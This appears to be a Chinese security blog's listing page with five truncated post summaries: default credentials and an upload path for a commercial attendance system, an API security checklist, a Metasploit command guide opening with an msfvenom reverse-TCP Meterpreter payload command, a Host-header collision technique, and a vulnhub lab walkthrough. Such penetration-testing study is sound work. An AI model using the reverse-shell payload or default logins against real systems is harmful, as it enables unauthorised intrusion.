摘要：# 目录 ## 文件上传目录 亿华考勤t9 `https://kaoqin.test.com:8111/filemanage/file/Default.aspx` 文件上传地址 ``` /filemanage/file/Default.aspx ``` # 口令 ``` Admin/Admin ad 阅读全文

摘要：开发安全的 API 所需要核对的清单 以下是当你在设计，测试以及发布你的 API 的时候所需要核对的重要安全措施。 身份认证 [ ] 不要使用 Basic Auth ，请使用标准的认证协议（如 JWT，OAuth）。 [ ] 不要重新实现 Authentication、token generatin 阅读全文

摘要：MSF命令大全详解 0x00 payload生成 windows&linux Windows： msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名 Linux: msfvenom 阅读全文

摘要：0x00 引言 在渗透测试中，搜集了很多IP资产，端口也开放了WEB服务，但打开总是403 404 400错误，扫目录也扫不到东西。这时候可以尝试利用HOSTS碰撞技术突破其边界对其内网系统进行攻击。 0x01 HOSTS碰撞 什么是HOSTS碰撞，当直接访问IP回显4xx错误，直接指定HOST头为 阅读全文

摘要：vulhub4下载地址自己搜索。 信息搜集 扫描靶机ip，netdiscover -i eth0，找到靶机ip为192.168.136.140 root@w0rk:~# dirb http://192.168.79.132/ root@w0rk:~# searchsploit phpmail 获取w 阅读全文